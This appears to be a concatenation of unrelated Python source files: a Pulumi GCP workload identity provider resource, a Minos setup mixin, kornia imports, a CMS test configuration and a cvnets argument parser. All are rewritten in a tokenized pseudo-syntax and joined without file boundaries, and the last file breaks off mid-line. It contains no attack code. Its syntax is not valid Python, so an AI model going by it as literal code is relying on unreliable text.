attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input[str] name: The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] state: The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep>opts=pulumi.ResourceOptions.merge(opts pulumi.ResourceOptions(id=id))<line_sep>__props__=_WorkloadIdentityPoolProviderState.__new__(_WorkloadIdentityPoolProviderState)<line_sep>__props__.__dict__["attribute_condition"]=attribute_condition<line_sep>__props__.__dict__["attribute_mapping"]=attribute_mapping<line_sep>__props__.__dict__["aws"]=aws<line_sep>__props__.__dict__["description"]=description<line_sep>__props__.__dict__["disabled"]=disabled<line_sep>__props__.__dict__["display_name"]=display_name<line_sep>__props__.__dict__["name"]=name<line_sep>__props__.__dict__["oidc"]=oidc<line_sep>__props__.__dict__["project"]=project<line_sep>__props__.__dict__["state"]=state<line_sep>__props__.__dict__["workload_identity_pool_id"]=workload_identity_pool_id<line_sep>__props__.__dict__["workload_identity_pool_provider_id"]=workload_identity_pool_provider_id<line_sep><return>WorkloadIdentityPoolProvider(resource_name opts=opts __props__=__props__)<block_end>@property@pulumi.getter(name="attributeCondition")<def_stmt>attribute_condition self<arrow>pulumi.Output[Optional[str]]<block_start>""" [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_condition")<block_end>@property@pulumi.getter(name="attributeMapping")<def_stmt>attribute_mapping self<arrow>pulumi.Output[Optional[Mapping[str str]]]<block_start>""" Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_mapping")<block_end>@property@pulumi.getter<def_stmt>aws self<arrow>pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderAws']]<block_start>""" An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. """<line_sep><return>pulumi.get(self "aws")<block_end>@property@pulumi.getter<def_stmt>description self<arrow>pulumi.Output[Optional[str]]<block_start>""" A description for the provider. Cannot exceed 256 characters. """<line_sep><return>pulumi.get(self "description")<block_end>@property@pulumi.getter<def_stmt>disabled self<arrow>pulumi.Output[Optional[bool]]<block_start>""" Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. """<line_sep><return>pulumi.get(self "disabled")<block_end>@property@pulumi.getter(name="displayName")<def_stmt>display_name self<arrow>pulumi.Output[Optional[str]]<block_start>""" A display name for the provider. Cannot exceed 32 characters. """<line_sep><return>pulumi.get(self "display_name")<block_end>@property@pulumi.getter<def_stmt>name self<arrow>pulumi.Output[str]<block_start>""" The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. """<line_sep><return>pulumi.get(self "name")<block_end>@property@pulumi.getter<def_stmt>oidc self<arrow>pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderOidc']]<block_start>""" An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. """<line_sep><return>pulumi.get(self "oidc")<block_end>@property@pulumi.getter<def_stmt>project self<arrow>pulumi.Output[str]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@property@pulumi.getter<def_stmt>state self<arrow>pulumi.Output[str]<block_start>""" The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. """<line_sep><return>pulumi.get(self "state")<block_end>@property@pulumi.getter(name="workloadIdentityPoolId")<def_stmt>workload_identity_pool_id self<arrow>pulumi.Output[str]<block_start>""" The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><return>pulumi.get(self "workload_identity_pool_id")<block_end>@property@pulumi.getter(name="workloadIdentityPoolProviderId")<def_stmt>workload_identity_pool_provider_id self<arrow>pulumi.Output[str]<block_start>""" The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><return>pulumi.get(self "workload_identity_pool_provider_id")<block_end><block_end>
<import_from_future_stmt> annotations <import_stmt>logging<import_stmt>warnings<import_from_stmt>pathlib Path <import_from_stmt>typing TYPE_CHECKING Optional Type TypeVar Union <import_from_stmt>.object Object <if_stmt>TYPE_CHECKING<block_start><import_from_stmt>.config Config <block_end>logger=logging.getLogger(__name__)<line_sep>S=TypeVar("S" bound="SetupMixin")<class_stmt>SetupMixin(Object)<block_start>"""Setup Mixin class."""<def_stmt>__init__ self *args already_setup:bool=<false> **kwargs<block_start>super().__init__(**kwargs)<line_sep>self._already_setup=already_setup<block_end>@property<def_stmt>already_setup self<arrow>bool<block_start>"""Already Setup getter. :return: A boolean value. """<line_sep><return>self._already_setup<block_end>@property<def_stmt>already_destroyed self<arrow>bool<block_start>"""Already Destroy getter. :return: A boolean value. """<line_sep><return><not>self._already_setup<block_end>@classmethod<def_stmt>from_config cls:Type[S] config:Optional[Union[Config Path]]=<none> **kwargs<arrow>S<block_start>"""Build a new instance from config. :param config: Config instance. If `None` is provided, default config is chosen. :param kwargs: Additional named arguments. :return: A instance of the called class. """<if_stmt>isinstance(config Path)<block_start><import_from_stmt>.config Config <line_sep>config=Config(config)<block_end><if_stmt>config<is><none><block_start><import_from_stmt>.config Config <import_from_stmt>.injections Inject <line_sep>config=Inject.resolve(Config)<block_end>logger.info(f"Building a {cls.__name__!r} instance from config...")<line_sep><return>cls._from_config(config=config **kwargs)<block_end>@classmethod<def_stmt>_from_config cls:Type[S] config:Config **kwargs<arrow>S<block_start><return>cls(**kwargs)<block_end><async_keyword><def_stmt>__aenter__ self:S<arrow>S<block_start><await>self.setup()<line_sep><return>self<block_end><async_keyword><def_stmt>setup self<arrow><none><block_start>"""Setup miscellaneous repository things. :return: This method does not return anything. """<if_stmt><not>self._already_setup<block_start>logger.debug(f"Setting up a {type(self).__name__!r} instance...")<line_sep><await>self._setup()<line_sep>self._already_setup=<true><block_end><block_end><async_keyword><def_stmt>_setup self<arrow><none><block_start><return><block_end><async_keyword><def_stmt>__aexit__ self exc_type exc_value exc_traceback<block_start><await>self.destroy()<block_end><async_keyword><def_stmt>destroy self<arrow><none><block_start>"""Destroy miscellaneous repository things. :return: This method does not return anything. """<if_stmt>self._already_setup<block_start>logger.debug(f"Destroying a {type(self).__name__!r} instance...")<line_sep><await>self._destroy()<line_sep>self._already_setup=<false><block_end><block_end><async_keyword><def_stmt>_destroy self<arrow><none><block_start>"""Destroy miscellaneous repository things."""<block_end><def_stmt>__del__ self<block_start><if_stmt><not>getattr(self "already_destroyed" <true>)<block_start>warnings.warn(f"A not destroyed {type(self).__name__!r} instance is trying to be deleted..." ResourceWarning)<block_end><block_end><block_end><class_stmt>MinosSetup(SetupMixin)<block_start>"""Minos Setup class."""<def_stmt>__init__ self *args **kwargs<block_start>warnings.warn(f"{MinosSetup!r} has been deprecated. Use {SetupMixin} instead." DeprecationWarning)<line_sep>super().__init__(*args **kwargs)<block_end><block_end>
<import_from_stmt>kornia.augmentation._3d.intensity.equalize RandomEqualize3D<import_from_stmt>kornia.augmentation._3d.intensity.motion_blur RandomMotionBlur3D<line_sep>
# Configuration file for RefTest_t <import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("TEST")<line_sep>process.load("FWCore.Framework.test.cmsExceptionsFatal_cff")<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(2))<line_sep>process.source=cms.Source("EmptySource")<line_sep>process.WhatsItESProducer=cms.ESProducer("WhatsItESProducer")<line_sep>process.DoodadESSource=cms.ESSource("DoodadESSource")<line_sep>process.Thing=cms.EDProducer("ThingProducer" offsetDelta=cms.int32(1))<line_sep>process.OtherThing=cms.EDProducer("OtherThingProducer")<line_sep>process.thingProducer=cms.EDProducer("ThingProducer" offsetDelta=cms.int32(100) nThings=cms.int32(50))<line_sep>process.trackOfThingsProducerA=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(0 1 2 3 4 5 6 7 8))<line_sep>process.trackOfThingsProducerB=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(0 1 2 3))<line_sep>process.trackOfThingsProducerC=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(4 5 6 7))<line_sep>process.trackOfThingsProducerD=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(10 11 12 13 14 15 16 17 18))<line_sep>process.trackOfThingsProducerDMinus=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(10 11 12 13 14 15 16 17))<line_sep>process.trackOfThingsProducerDPlus=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(10 11 12 13 14 15 16 17 18 21))<line_sep>process.trackOfThingsProducerE=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(10 11 12 13 14))<line_sep>process.trackOfThingsProducerF=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(14 15 16 17))<line_sep>process.trackOfThingsProducerG=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(20 21 22 23 24 25 26 27 28))<line_sep>process.trackOfThingsProducerH=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(20 21 22 23))<line_sep>process.trackOfThingsProducerI=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(24 25 26 27))<line_sep>process.trackOfThingsProducerJ=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(30 31 32 33 34 35 36 37 38))<line_sep>process.trackOfThingsProducerK=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(30 31 32 33))<line_sep>process.trackOfThingsProducerL=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(34 35 36 37))<line_sep>process.trackOfThingsProducerM=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(40 41 42 43 44 45 46 47 48))<line_sep>process.trackOfThingsProducerN=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(40 41 42 43))<line_sep>process.trackOfThingsProducerO=cms.EDProducer("TrackOfThingsProducer" inputTag=cms.InputTag('thingProducer') keysToReference=cms.vuint32(44 45 46 47))<line_sep>process.thinningThingProducerA=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerA') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerB=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerA') trackTag=cms.InputTag('trackOfThingsProducerB') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerC=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerA') trackTag=cms.InputTag('trackOfThingsProducerC') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerD=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerD') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerE=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerD') trackTag=cms.InputTag('trackOfThingsProducerE') offsetToThinnedKey=cms.uint32(10) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerF=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerD') trackTag=cms.InputTag('trackOfThingsProducerF') offsetToThinnedKey=cms.uint32(10) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerG=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerG') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerH=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerG') trackTag=cms.InputTag('trackOfThingsProducerH') offsetToThinnedKey=cms.uint32(20) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerI=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerG') trackTag=cms.InputTag('trackOfThingsProducerI') offsetToThinnedKey=cms.uint32(20) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerJ=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerJ') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerK=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerJ') trackTag=cms.InputTag('trackOfThingsProducerK') offsetToThinnedKey=cms.uint32(30) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerL=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerJ') trackTag=cms.InputTag('trackOfThingsProducerL') offsetToThinnedKey=cms.uint32(30) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerM=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thingProducer') trackTag=cms.InputTag('trackOfThingsProducerM') offsetToThinnedKey=cms.uint32(0) expectedCollectionSize=cms.uint32(50))<line_sep>process.thinningThingProducerN=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerM') trackTag=cms.InputTag('trackOfThingsProducerN') offsetToThinnedKey=cms.uint32(40) expectedCollectionSize=cms.uint32(9))<line_sep>process.thinningThingProducerO=cms.EDProducer("ThinningThingProducer" inputTag=cms.InputTag('thinningThingProducerM') trackTag=cms.InputTag('trackOfThingsProducerO') offsetToThinnedKey=cms.uint32(40) expectedCollectionSize=cms.uint32(9))<line_sep>process.out=cms.OutputModule("PoolOutputModule" fileName=cms.untracked.string('goodDataFormatsFWLite.root') outputCommands=cms.untracked.vstring('keep *' 'drop *_thingProducer_*_*' 'drop *_thinningThingProducerD_*_*' 'drop *_thinningThingProducerH_*_*' 'drop *_thinningThingProducerI_*_*' 'drop *_thinningThingProducerJ_*_*' 'drop *_thinningThingProducerK_*_*' 'drop *_thinningThingProducerL_*_*' 'drop *_thinningThingProducerM_*_*' 'drop *_thinningThingProducerN_*_*' ))<line_sep>process.out2=cms.OutputModule("PoolOutputModule" fileName=cms.untracked.string('good2DataFormatsFWLite.root'))<line_sep>process.out_other=cms.OutputModule("PoolOutputModule" outputCommands=cms.untracked.vstring('drop *' 'keep edmtestOtherThings_*_*_*' 'keep *_TriggerResults_*_*') fileName=cms.untracked.string('other_onlyDataFormatsFWLite.root'))<line_sep>process.thinningTestPath=cms.Path(process.thingProducer<times>process.trackOfThingsProducerA<times>process.trackOfThingsProducerB<times>process.trackOfThingsProducerC<times>process.trackOfThingsProducerD<times>process.trackOfThingsProducerDMinus<times>process.trackOfThingsProducerDPlus<times>process.trackOfThingsProducerE<times>process.trackOfThingsProducerF<times>process.trackOfThingsProducerG<times>process.trackOfThingsProducerH<times>process.trackOfThingsProducerI<times>process.trackOfThingsProducerJ<times>process.trackOfThingsProducerK<times>process.trackOfThingsProducerL<times>process.trackOfThingsProducerM<times>process.trackOfThingsProducerN<times>process.trackOfThingsProducerO<times>process.thinningThingProducerA<times>process.thinningThingProducerB<times>process.thinningThingProducerC<times>process.thinningThingProducerD<times>process.thinningThingProducerE<times>process.thinningThingProducerF<times>process.thinningThingProducerG<times>process.thinningThingProducerH<times>process.thinningThingProducerI<times>process.thinningThingProducerJ<times>process.thinningThingProducerK<times>process.thinningThingProducerL<times>process.thinningThingProducerM<times>process.thinningThingProducerN<times>process.thinningThingProducerO)<line_sep>process.p=cms.Path(process.Thing<times>process.OtherThing)<line_sep>process.outp=cms.EndPath(process.out<times>process.out2<times>process.out_other)<line_sep>
# # For licensing see accompanying LICENSE file. # Copyright (C) 2022 Apple Inc. All Rights Reserved. # <import_stmt>argparse<import_from_stmt>typing Optional<import_from_stmt>data.sampler arguments_sampler<import_from_stmt>data.collate_fns arguments_collate_fn<import_from_stmt>options.utils load_config_file<import_from_stmt>data.datasets arguments_dataset<import_from_stmt>cvnets arguments_model arguments_nn_layers arguments_ema<import_from_stmt>cvnets.anchor_generator arguments_anchor_gen<import_from_stmt>loss_fn arguments_loss_fn<import_from_stmt>optim arguments_optimizer<import_from_stmt>optim.scheduler arguments_scheduler<import_from_stmt>common SUPPORTED_MODALITIES<import_from_stmt>data.transforms arguments_augmentation<import_from_stmt>metrics arguments_stats<import_from_stmt>data.video_reader arguments_video_reader<import_from_stmt>cvnets.matcher_det arguments_box_matcher<import_from_stmt>utils logger<class_stmt>ParseKwargs(argparse.Action)<block_start><def_stmt>__call__ self parser namespace values option_string=<none><block_start>namespace_dict=vars(namespace)<if_stmt>len(values)<g>0<block_start>override_dict={}<line_sep># values are list of key-value pairs <for_stmt>value values<block_start>key=<none><try_stmt><block_start>key,value=value.split("=")<block_end><except_stmt>ValueError<as>e<block_start>logger.error("For override arguments, a key-value pair of the form key=value is expected")<block_end><if_stmt>key<in>namespace_dict<block_start>value_namespace=namespace_dict[key]<if_stmt>value_namespace<is><none><and>value<is><none><block_start>value=<none><block_end><elif_stmt>value_namespace<is><none><and>value<is><not><none># possibly a string or list of strings or list of integers # check if string is a list or not <block_start>value=value.split(",")<if_stmt>len(value)<eq>1# its a string <block_start>value=str(value[0])<line_sep># check if its empty string or not <if_stmt>value<eq>""<or>value.lower()<eq>"none"<block_start>value=<none><block_end><block_end><else_stmt># its a list of integers or strings <block_start><try_stmt># convert to int <block_start>value=[int(v)<for>v value]<block_end><except_stmt># pass because its a string <block_start><pass><block_end><block_end><block_end><else_stmt><block_start><try_stmt><block_start><if_stmt>value.lower()<eq>"true"# check for boolean <block_start>value=<true><block_end><elif_stmt>value.lower()<eq>"false"<block_start>value=<false><block_end><else_stmt><block_start>desired_type=type(value_namespace)<line_sep>value=desired_type(value)<block_end><block_end><except_stmt>ValueError<as>e<block_start>logger.warning("Type mismatch while over-riding. Skipping key: {}".format(key))<line_sep><continue><block_end><block_end>override_dict[key]=value<block_end><block_end>setattr(namespace "override_args" override_dict)<block_end><else_stmt><block_start>setattr(namespace "override_args" <none>)<block_end><block_end><block_end><def_stmt>arguments_common parser:argparse.ArgumentParser<arrow>argparse.ArgumentParser<block_start>group=parser.add_argument_group(title="Common arguments" description="Common arguments")<line_sep>group.add_argument("--common.seed" type=int default=0 help="Random seed")<line_sep>group.add_argument("--common.config-file" type=str default=<none> help="Configuration file")<line_sep>group.add_argument("--common.results-loc" type=str default="results" help="Directory where results will be stored" )<line_sep>group.add_argument("--common.run-label" type=str default="run_1" help="Label id for the current run" )<line_sep>group.add_argument("--common.resume" type=str default=<none> help="Resume location")<line_sep>group.add_argument("--common.finetune_imagenet1k" type=str default=<none> help="Checkpoint location to be used for finetuning" )<line_sep>group.add_argument("--common.finetune_imagenet1k-ema" type=str default=<none> help="EMA Checkpoint location to be used for finetuning" )<line_sep>group.add_argument("--common.mixed-precision" action="store_true" help="Mixed precision training")<line_sep>group.add_argument("--common.accum-freq" type=int default=1 help="Accumulate gradients for this number of iterations" )<line_sep>group.add_argument("--common.accum-after-epoch" type=int default=0 help="Start accumulation after this many epochs" )<line_sep>group.add_argument("--common.log-freq" type=int default=100 help="Display after these many iterations" )<line_sep>group.add_argument("--common.auto-resume" action="store_true" help="Resume training from the last checkpoint" )<line_sep>group.add_argument("--common.grad-clip" type=float default=<none> help="Gradient clipping value")<line_sep>group.add_argument("--common.k-best-checkpoints" type=int default=5 help="Keep k-best checkpoints" )<line_sep>group.add_argument("--common.inference-modality" type=str default="image" choices=SUPPORTED_MODALITIES help="Inference modality. Image or videos" )<line_sep>group.add_argument("--common.channels-last" action="store_true" default=<false> help="Use channel last format during training. "<concat>"Note 1: that some models may not support it, so we recommend to use it with caution"<concat>"Note 2: Channel last format does not work with 1-, 2-, and 3- tensors. "<concat>"Therefore, we support it via custom collate functions" )<line_sep>group.add_argument("--common.tensorboard-logging" action="store_true" help="Enable tensorboard logging" )<line_sep>group.add_argument("--common.bolt-logging" action="store_true" help="Enable bolt logging")<line_sep>group.add_argument("--common.override-kwargs" nargs="*" action=ParseKwargs help="Override arguments. Example. To override the value of --sampler.vbs.crop-size-width, "<concat>"we can pass override argument as "<concat>"--common.override-kwargs sampler.vbs.crop_size_width=512 \n "<concat>"Note that keys in override arguments do not contain -- or -" )<line_sep>group.add_argument("--common.enable-coreml-compatible-module" action="store_true" help="Use coreml compatible modules (if applicable) during inference" )<line_sep>group.add_argument("--common.debug-mode" action="store_true" help="You can use this flag for debugging purposes." )<line_sep><return>parser<block_end><def_stmt>arguments_ddp parser:argparse.ArgumentParser<arrow>argparse.ArgumentParser<block_start>group=parser.add_argument_group(title="DDP arguments" description="DDP arguments")<line_sep>group.add_argument("--ddp.disable" action="store_true" help="Don't use DDP")<line_sep>group.add_argument("--ddp.rank" type=int default=0 help="Node rank for distributed training")<line_sep>group.add_argument("--ddp.world-size" type=int default=-1 help="World size for DDP")<line_sep>group.add_argument("--ddp.dist-url" type=str default=<none> help="DDP URL")<line_sep>group.add_argument("--ddp.dist-port" type=int default=30786 help="DDP Port. Only used when --ddp.dist-url is not specified" )<line_sep>group.add_argument("--ddp.device-id" type=int default=<none> help="Device ID")<line_sep>group.add_argument("--ddp.no-spawn" action="store_true" help="Don't use DDP with spawn")<line_sep>group.add_argument("--ddp.backend" type=str default="nccl" help="DDP backend. Default is nccl")<line_sep>group.add_argument("--ddp.find-unused-params" action="store_true" help="Find unused params in model. useful for debugging with DDP" )<line_sep><return>parser<block_end><def_stmt>get_training_arguments parse_args:Optional[bool]=<true><block_start>parser=argparse.ArgumentParser(description="Training arguments" add_help=<true>)<line_sep># sampler related arguments parser=arguments_sampler(parser=parser)<line_sep># dataset related arguments parser=arguments_dataset(parser=parser)<line_sep># anchor generator arguments parser=arguments_anchor_gen(parser=parser)<line_sep># arguments related to box matcher parser=arguments_box_matcher(parser=parser)<line_sep># Video reader related arguments parser=arguments_video_reader(parser=parser)<line_sep># collate fn related arguments parser=arguments_collate_fn(parser=parser)<line_sep># transform related arguments parser=arguments_augmentation(parser=parser)<line_sep># model related arguments parser=arguments_nn_layers(parser=parser)<line_sep>parser=arguments_model(parser=parser)<line_sep>parser=arguments_ema(parser=parser)<line_sep># loss function arguments parser=arguments_loss_fn(parser=parser)<line_sep># optimizer arguments parser=arguments_optimizer(parser=parser)<line_sep>parser=arguments_scheduler(parser=parser)<line_sep># DDP arguments parser=arguments_ddp(parser=parser)<line_sep># stats arguments parser=arguments_stats(parser=parser)<line_sep># common parser=arguments_common(parser=parser)<if_stmt>parse_args# parse args <block_start>opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><else_stmt><block_start><return>parser<block_end><block_end><def_stmt>get_eval_arguments parse_args=<true><block_start><return>get_training_arguments(parse_args=parse_args)<block_end><def_stmt>get_conversion_arguments <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep># Arguments related to coreml conversion group=parser.add_argument_group("Conversion arguments")<line_sep>group.add_argument("--conversion.coreml-extn" type=str default="mlmodel" help="Extension for converted model. Default is mlmodel" )<line_sep>group.add_argument("--conversion.input-image-path" type=str default=<none> help="Path of the image to be used for 